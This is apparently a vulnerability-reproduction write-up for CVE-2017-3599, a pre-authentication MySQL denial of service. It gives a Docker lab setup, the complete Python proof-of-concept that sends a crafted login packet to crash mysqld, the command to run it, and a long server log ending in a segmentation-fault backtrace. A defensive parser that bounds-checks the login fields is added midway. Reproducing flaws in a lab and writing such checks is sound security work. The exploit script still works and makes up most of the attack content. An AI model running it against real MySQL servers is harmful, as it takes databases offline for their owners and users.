CVE-2017-3599 vulnerability reproduction

Reference links

MySQL < 5.6.35 / < 5.7.17 - Integer Overflow - Multiple DoS Exploit

Vulnerability description

Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Pluggable Auth). Supported versions that are affected are 5.6.35 and earlier and 5.7.17 and earlier. Easily “exploitable” vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). NOTE: the previous information is from the April 2017 CPU. Oracle has not commented on third-party claims that this issue is an integer overflow in sql/auth/sql_authentication.cc which allows remote attackers to cause a denial of service via a crafted authentication packet.

Test environment

  • Docker image: mysql:5.6.35
  • Start the target container: docker run -d -p 3306:3306 -e MYSQL_ROOT_PASSWORD=123456 mysql:5.6.35

PoC script

# python2.7

'''
# Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py
# Exploit Title: Remote MySQL DOS (Integer Overflow)
# Google Dork: N/A
# Date: 13th April 2017
# Exploit Author: Rodrigo Marcos
# Vendor Homepage: https://www.mysql.com/
# Software Link: https://www.mysql.com/downloads/
# Version: 5.6.35 and below / 5.7.17 and below
# Tested on: N/A
# CVE : CVE-2017-3599
'''

import socket
import sys
from struct import pack

'''
CVE-2017-3599 Proof of Concept exploit code.

https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/

Rodrigo Marcos

'''

if len(sys.argv) < 2:
    print "Usage: python " + sys.argv[0] + " host [port]"
    exit(0)
else:
    HOST = sys.argv[1]

if len(sys.argv) > 2:
    PORT = int(sys.argv[2])  # Yes, no error checking... living on the wild side!
else:
    PORT = 3306

print "[+] Creating packet..."

'''
3 bytes  Packet length
1 byte   Packet number

Login request:

Packet format (when the server is 4.1 or newer):

Bytes  Content
-----  -------
4      client capabilities
4      max packet size
1      charset number
23     reserved (always 0)
n      user name, \0-terminated
n      plugin auth data (e.g. scramble), length encoded
n      database name, \0-terminated
       (if CLIENT_CONNECT_WITH_DB is set in the capabilities)
n      client auth plugin name - \0-terminated string,
       (if CLIENT_PLUGIN_AUTH is set in the capabilities)

'''

# packet_len = '\x64\x00\x00'

packet_num = '\x01'

# Login request packet
packet_cap = '\x85\xa2\xbf\x01'  # client capabilities (default)
packet_max = '\x00\x00\x00\x01'  # max packet size (default)
packet_cset = '\x21'             # charset (default)
p_reserved = '\x00' * 23         # 23 bytes reserved with nulls (default)
packet_usr = 'test\x00'          # username null terminated (default)

packet_auth = '\xff'  # both \xff and \xfe crash the server

'''
Conditions to crash:

1 - packet_auth must start with \xff or \xfe
2 - packet_auth must be shorter than 8 chars

The expected value is the password, which could be of two different formats
(null terminated or length encoded) depending on the client functionality.
'''

packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth
packet_len = pack('i', len(packet))[:3]  # 3-byte little-endian payload length

request = packet_len + packet_num + packet

print "[+] Connecting to host..."
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    print "[+] Connected."
except:
    print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + "."
    s.close()
    print "[+] Exiting."
    exit(0)

print "[+] Receiving greeting from remote host..."
data = s.recv(1024)
print "[+] Done."

print "[+] Sending our payload..."
s.send(request)
print "[+] Done."
# print "Our data: %r" % request

s.close()
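
The crash condition the PoC comments describe (a 0xfe/0xff length prefix in the auth-data field with fewer bytes behind it than the prefix promises) is a missing bounds check in the server's login-request parser. As an added example, not part of the original post or the SECFORCE PoC, the Python 3 code below parses the HandshakeResponse41 layout quoted in the PoC and validates every length-encoded and NUL-terminated field against the bytes actually remaining, so the PoC-shaped packet is rejected instead of being read past its end. The capability bit names are the MySQL protocol's; the two sample packets are constructed here from the PoC's fixed fields.

```python
import struct
CLIENT_CONNECT_WITH_DB = 0x00000008                 # capability bits from the MySQL protocol
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000
CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA = 0x00200000  # set in the PoC's 0x01bfa285

def read_lenenc_int(buf, pos):
    # Decode a length-encoded integer at buf[pos]; never read past the end of buf.
    if pos >= len(buf):
        raise ValueError("length prefix missing at offset %d" % pos)
    first = buf[pos]
    if first < 0xfb:
        return first, pos + 1
    width = {0xfc: 2, 0xfd: 3, 0xfe: 8}.get(first)  # 0xff is never a valid prefix
    if width is None or pos + 1 + width > len(buf):
        raise ValueError("length prefix 0x%02x at offset %d is invalid or truncated" % (first, pos))
    return int.from_bytes(buf[pos + 1:pos + 1 + width], "little"), pos + 1 + width

def read_cstring(buf, pos, what):
    # Read a NUL-terminated field; fail instead of scanning beyond the packet.
    end = buf.find(b"\x00", pos)
    if end < 0:
        raise ValueError("%s is not NUL-terminated" % what)
    return buf[pos:end], end + 1

def parse_handshake_response41(payload):
    """Parse a login request body (4-byte packet header stripped); raise ValueError if malformed."""
    if len(payload) < 32:
        raise ValueError("payload shorter than the fixed 32-byte header")
    caps, _max_packet, charset = struct.unpack_from("<IIB", payload, 0)
    user, pos = read_cstring(payload, 32, "user name")   # 23 reserved bytes skipped
    auth_len = None                                       # None: old-style NUL-terminated password
    if caps & CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA:
        auth_len, pos = read_lenenc_int(payload, pos)    # the path CVE-2017-3599 abuses
    elif caps & CLIENT_SECURE_CONNECTION:
        if pos >= len(payload):
            raise ValueError("auth length byte missing")
        auth_len, pos = payload[pos], pos + 1
    if auth_len is None:
        auth, pos = read_cstring(payload, pos, "auth data")
    elif pos + auth_len > len(payload):
        raise ValueError("auth data claims %d bytes, only %d left" % (auth_len, len(payload) - pos))
    else:
        auth, pos = payload[pos:pos + auth_len], pos + auth_len
    db = plugin = None
    if caps & CLIENT_CONNECT_WITH_DB:
        db, pos = read_cstring(payload, pos, "database name")
    if caps & CLIENT_PLUGIN_AUTH:
        plugin, pos = read_cstring(payload, pos, "auth plugin name")
    return {"caps": caps, "charset": charset, "user": user, "auth": auth, "db": db, "plugin": plugin}

FIXED = b"\x85\xa2\xbf\x01" + b"\x00\x00\x00\x01" + b"\x21" + b"\x00" * 23 + b"test\x00"  # PoC fields (constructed)
POC_SHAPED = FIXED + b"\xff"                                              # prefix with nothing behind it
WELL_FORMED = FIXED + b"\x14" + b"A" * 20 + b"mysql_native_password\x00"  # 20-byte scramble reply

def check(payload):  # (True, parsed fields) for a well-formed login request, (False, reason) otherwise
    try:
        return True, parse_handshake_response41(payload)
    except ValueError as exc:
        return False, str(exc)
```

Feeding the same parser a capture of real client logins is a quick way to confirm that a correct implementation only ever reads lengths it has first checked against the packet size.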

Running the attack

python poc.py IP 3306

Attack result

The server is denied service; the database container's log shows the crash:

root@yml-penetration:~/Workspace/cve-2017-3599# docker logs 100
Initializing database
2023-12-19 12:19:33 0 [Note] Ignoring --secure-file-priv value as server is running with --bootstrap.
2023-12-19 12:19:33 0 [Note] /usr/sbin/mysqld (mysqld 5.6.35) starting as process 36 ...
2023-12-19 12:19:33 36 [Note] InnoDB: Using atomics to ref count buffer pool pages
2023-12-19 12:19:33 36 [Note] InnoDB: The InnoDB memory heap is disabled
2023-12-19 12:19:33 36 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
2023-12-19 12:19:33 36 [Note] InnoDB: Memory barrier is not used
2023-12-19 12:19:33 36 [Note] InnoDB: Compressed tables use zlib 1.2.8
2023-12-19 12:19:33 36 [Note] InnoDB: Using Linux native AIO
2023-12-19 12:19:33 36 [Note] InnoDB: Not using CPU crc32 instructions
2023-12-19 12:19:33 36 [Note] InnoDB: Initializing buffer pool, size = 128.0M
2023-12-19 12:19:33 36 [Note] InnoDB: Completed initialization of buffer pool
2023-12-19 12:19:33 36 [Note] InnoDB: The first specified data file ./ibdata1 did not exist: a new database to be created!
2023-12-19 12:19:33 36 [Note] InnoDB: Setting file ./ibdata1 size to 12 MB
2023-12-19 12:19:33 36 [Note] InnoDB: Database physically writes the file full: wait...
2023-12-19 12:19:33 36 [Note] InnoDB: Setting log file ./ib_logfile101 size to 48 MB
2023-12-19 12:19:33 36 [Note] InnoDB: Setting log file ./ib_logfile1 size to 48 MB
2023-12-19 12:19:34 36 [Note] InnoDB: Renaming log file ./ib_logfile101 to ./ib_logfile0
2023-12-19 12:19:34 36 [Warning] InnoDB: New log files created, LSN=45781
2023-12-19 12:19:34 36 [Note] InnoDB: Doublewrite buffer not found: creating new
2023-12-19 12:19:34 36 [Note] InnoDB: Doublewrite buffer created
2023-12-19 12:19:34 36 [Note] InnoDB: 128 rollback segment(s) are active.
2023-12-19 12:19:34 36 [Warning] InnoDB: Creating foreign key constraint system tables.
2023-12-19 12:19:34 36 [Note] InnoDB: Foreign key constraint system tables created
2023-12-19 12:19:34 36 [Note] InnoDB: Creating tablespace and datafile system tables.
2023-12-19 12:19:34 36 [Note] InnoDB: Tablespace and datafile system tables created.
2023-12-19 12:19:34 36 [Note] InnoDB: Waiting for purge to start
2023-12-19 12:19:34 36 [Note] InnoDB: 5.6.35 started; log sequence number 0
2023-12-19 12:19:36 36 [Note] Binlog end
2023-12-19 12:19:36 36 [Note] InnoDB: FTS optimize thread exiting.
2023-12-19 12:19:36 36 [Note] InnoDB: Starting shutdown...
2023-12-19 12:19:38 36 [Note] InnoDB: Shutdown completed; log sequence number 1625977


2023-12-19 12:19:38 0 [Note] Ignoring --secure-file-priv value as server is running with --bootstrap.
2023-12-19 12:19:38 0 [Note] /usr/sbin/mysqld (mysqld 5.6.35) starting as process 59 ...
2023-12-19 12:19:38 59 [Note] InnoDB: Using atomics to ref count buffer pool pages
2023-12-19 12:19:38 59 [Note] InnoDB: The InnoDB memory heap is disabled
2023-12-19 12:19:38 59 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
2023-12-19 12:19:38 59 [Note] InnoDB: Memory barrier is not used
2023-12-19 12:19:38 59 [Note] InnoDB: Compressed tables use zlib 1.2.8
2023-12-19 12:19:38 59 [Note] InnoDB: Using Linux native AIO
2023-12-19 12:19:38 59 [Note] InnoDB: Not using CPU crc32 instructions
2023-12-19 12:19:38 59 [Note] InnoDB: Initializing buffer pool, size = 128.0M
2023-12-19 12:19:38 59 [Note] InnoDB: Completed initialization of buffer pool
2023-12-19 12:19:38 59 [Note] InnoDB: Highest supported file format is Barracuda.
2023-12-19 12:19:38 59 [Note] InnoDB: 128 rollback segment(s) are active.
2023-12-19 12:19:38 59 [Note] InnoDB: Waiting for purge to start
2023-12-19 12:19:38 59 [Note] InnoDB: 5.6.35 started; log sequence number 1625977
2023-12-19 12:19:38 59 [Note] Binlog end
2023-12-19 12:19:38 59 [Note] InnoDB: FTS optimize thread exiting.
2023-12-19 12:19:38 59 [Note] InnoDB: Starting shutdown...
2023-12-19 12:19:40 59 [Note] InnoDB: Shutdown completed; log sequence number 1625987




PLEASE REMEMBER TO SET A PASSWORD FOR THE MySQL root USER !
To do so, start the server, then issue the following commands:

/usr/bin/mysqladmin -u root password 'new-password'
/usr/bin/mysqladmin -u root -h 100bfe039d09 password 'new-password'

Alternatively you can run:

/usr/bin/mysql_secure_installation

which will also give you the option of removing the test
databases and anonymous user created by default. This is
strongly recommended for production servers.

See the manual for more instructions.

Please report any problems at http://bugs.mysql.com/

The latest information about MySQL is available on the web at

http://www.mysql.com

Support MySQL by buying support/licenses at http://shop.mysql.com

Note: new default config file not created.
Please make sure your config file is current

WARNING: Default config file /etc/mysql/my.cnf exists on the system
This file will be read by default by the MySQL server
If you do not want to use this, either remove it, or use the
--defaults-file argument to mysqld_safe when starting the server

Database initialized
MySQL init process in progress...
2023-12-19 12:19:40 0 [Note] mysqld (mysqld 5.6.35) starting as process 87 ...
2023-12-19 12:19:40 87 [Note] Plugin 'FEDERATED' is disabled.
2023-12-19 12:19:40 87 [Note] InnoDB: Using atomics to ref count buffer pool pages
2023-12-19 12:19:40 87 [Note] InnoDB: The InnoDB memory heap is disabled
2023-12-19 12:19:40 87 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
2023-12-19 12:19:40 87 [Note] InnoDB: Memory barrier is not used
2023-12-19 12:19:40 87 [Note] InnoDB: Compressed tables use zlib 1.2.8
2023-12-19 12:19:40 87 [Note] InnoDB: Using Linux native AIO
2023-12-19 12:19:40 87 [Note] InnoDB: Not using CPU crc32 instructions
2023-12-19 12:19:40 87 [Note] InnoDB: Initializing buffer pool, size = 128.0M
2023-12-19 12:19:40 87 [Note] InnoDB: Completed initialization of buffer pool
2023-12-19 12:19:40 87 [Note] InnoDB: Highest supported file format is Barracuda.
2023-12-19 12:19:40 87 [Note] InnoDB: 128 rollback segment(s) are active.
2023-12-19 12:19:40 87 [Note] InnoDB: Waiting for purge to start
2023-12-19 12:19:40 87 [Note] InnoDB: 5.6.35 started; log sequence number 1625987
2023-12-19 12:19:40 87 [Warning] No existing UUID has been found, so we assume that this is the first time that this server has been started. Generating a new UUID: e27a6a12-9e68-11ee-867c-0242ac110002.
2023-12-19 12:19:40 87 [Warning] 'user' entry 'root@100bfe039d09' ignored in --skip-name-resolve mode.
2023-12-19 12:19:40 87 [Warning] 'user' entry '@100bfe039d09' ignored in --skip-name-resolve mode.
2023-12-19 12:19:40 87 [Warning] 'proxies_priv' entry '@ root@100bfe039d09' ignored in --skip-name-resolve mode.
2023-12-19 12:19:40 87 [Note] Event Scheduler: Loaded 0 events
2023-12-19 12:19:40 87 [Note] mysqld: ready for connections.
Version: '5.6.35' socket: '/var/run/mysqld/mysqld.sock' port: 0 MySQL Community Server (GPL)
Warning: Unable to load '/usr/share/zoneinfo/iso3166.tab' as time zone. Skipping it.
Warning: Unable to load '/usr/share/zoneinfo/leap-seconds.list' as time zone. Skipping it.
Warning: Unable to load '/usr/share/zoneinfo/zone.tab' as time zone. Skipping it.
2023-12-19 12:19:42 87 [Warning] 'proxies_priv' entry '@ root@100bfe039d09' ignored in --skip-name-resolve mode.

2023-12-19 12:19:42 87 [Note] mysqld: Normal shutdown

2023-12-19 12:19:42 87 [Note] Giving 0 client threads a chance to die gracefully
2023-12-19 12:19:42 87 [Note] Event Scheduler: Purging the queue. 0 events
2023-12-19 12:19:42 87 [Note] Shutting down slave threads
2023-12-19 12:19:42 87 [Note] Forcefully disconnecting 0 remaining clients
2023-12-19 12:19:42 87 [Note] Binlog end
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'partition'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_DATAFILES'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_TABLESPACES'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_FOREIGN_COLS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_FOREIGN'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_FIELDS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_COLUMNS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_INDEXES'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_TABLESTATS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_TABLES'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_INDEX_TABLE'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_INDEX_CACHE'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_CONFIG'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_BEING_DELETED'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_DELETED'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_DEFAULT_STOPWORD'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_METRICS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_BUFFER_POOL_STATS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_BUFFER_PAGE_LRU'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_BUFFER_PAGE'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMP_PER_INDEX_RESET'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMP_PER_INDEX'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMPMEM_RESET'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMPMEM'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMP_RESET'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMP'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_LOCK_WAITS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_LOCKS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_TRX'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'InnoDB'
2023-12-19 12:19:42 87 [Note] InnoDB: FTS optimize thread exiting.
2023-12-19 12:19:42 87 [Note] InnoDB: Starting shutdown...
2023-12-19 12:19:43 87 [Note] InnoDB: Shutdown completed; log sequence number 1625997
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'BLACKHOLE'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'ARCHIVE'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'PERFORMANCE_SCHEMA'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'MRG_MYISAM'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'MyISAM'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'CSV'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'MEMORY'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'sha256_password'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'mysql_old_password'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'mysql_native_password'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'binlog'
2023-12-19 12:19:43 87 [Note] mysqld: Shutdown complete


MySQL init process done. Ready for start up.

2023-12-19 12:19:44 0 [Note] mysqld (mysqld 5.6.35) starting as process 1 ...
2023-12-19 12:19:44 1 [Note] Plugin 'FEDERATED' is disabled.
2023-12-19 12:19:44 1 [Note] InnoDB: Using atomics to ref count buffer pool pages
2023-12-19 12:19:44 1 [Note] InnoDB: The InnoDB memory heap is disabled
2023-12-19 12:19:44 1 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
2023-12-19 12:19:44 1 [Note] InnoDB: Memory barrier is not used
2023-12-19 12:19:44 1 [Note] InnoDB: Compressed tables use zlib 1.2.8
2023-12-19 12:19:44 1 [Note] InnoDB: Using Linux native AIO
2023-12-19 12:19:44 1 [Note] InnoDB: Not using CPU crc32 instructions
2023-12-19 12:19:44 1 [Note] InnoDB: Initializing buffer pool, size = 128.0M
2023-12-19 12:19:44 1 [Note] InnoDB: Completed initialization of buffer pool
2023-12-19 12:19:44 1 [Note] InnoDB: Highest supported file format is Barracuda.
2023-12-19 12:19:44 1 [Note] InnoDB: 128 rollback segment(s) are active.
2023-12-19 12:19:44 1 [Note] InnoDB: Waiting for purge to start
2023-12-19 12:19:44 1 [Note] InnoDB: 5.6.35 started; log sequence number 1625997
2023-12-19 12:19:44 1 [Note] Server hostname (bind-address): '*'; port: 3306
2023-12-19 12:19:44 1 [Note] IPv6 is available.
2023-12-19 12:19:44 1 [Note] - '::' resolves to '::';
2023-12-19 12:19:44 1 [Note] Server socket created on IP: '::'.
2023-12-19 12:19:44 1 [Warning] 'proxies_priv' entry '@ root@100bfe039d09' ignored in --skip-name-resolve mode.
2023-12-19 12:19:44 1 [Note] Event Scheduler: Loaded 0 events
2023-12-19 12:19:44 1 [Note] mysqld: ready for connections.
Version: '5.6.35' socket: '/var/run/mysqld/mysqld.sock' port: 3306 MySQL Community Server (GPL)
12:21:29 UTC - mysqld got signal 11 ;
This could be because you hit a bug. It is also possible that this binary
or one of the libraries it was linked against is corrupt, improperly built,
or misconfigured. This error can also be caused by malfunctioning hardware.
We will try our best to scrape up some info that will hopefully help
diagnose the problem, but since we have already crashed,
something is definitely wrong and this may fail.

key_buffer_size=8388608
read_buffer_size=131072
max_used_connections=1
max_threads=151
thread_count=1
connection_count=1
It is possible that mysqld could use up to
key_buffer_size + (read_buffer_size + sort_buffer_size)*max_threads = 68108 K bytes of memory
Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x23d86c0
Attempting backtrace. You can use the following information to find out
where mysqld died. If you see no messages after this, something went
terribly wrong...
stack_bottom = 7f3ca45a1e98 thread_stack 0x40000
mysqld(my_print_stacktrace+0x2c)[0x8c3d5c]
mysqld(handle_fatal_signal+0x481)[0x661df1]
/lib/x86_64-linux-gnu/libpthread.so.0(+0xf890)[0x7f3ccee40890]
/lib/x86_64-linux-gnu/libc.so.6(memchr+0x78)[0x7f3ccd885cd8]
mysqld[0x672dc4]
mysqld[0x683e2d]
mysqld[0x68433e]
mysqld[0x6730a9]
mysqld[0x6724df]
mysqld(_Z16acl_authenticateP3THDj+0x1bd)[0x68450d]
mysqld[0x6abe17]
mysqld(_Z16login_connectionP3THD+0x42)[0x6acbe2]
mysqld(_Z22thd_prepare_connectionP3THD+0x19)[0x6ad329]
mysqld(_Z24do_handle_one_connectionP3THD+0x11c)[0x6ad49c]
mysqld(handle_one_connection+0x40)[0x6ad570]
mysqld(pfs_spawn_thread+0x146)[0x8fa106]
/lib/x86_64-linux-gnu/libpthread.so.0(+0x8064)[0x7f3ccee39064]
/lib/x86_64-linux-gnu/libc.so.6(clone+0x6d)[0x7f3ccd8e962d]

Trying to get some variables.
Some pointers may be invalid and cause the dump to abort.
Query (0): Connection ID (thread ID): 1
Status: NOT_KILLED

The manual page at http://dev.mysql.com/doc/mysql/en/crashing.html contains
information that should help you find out what is causing the crash.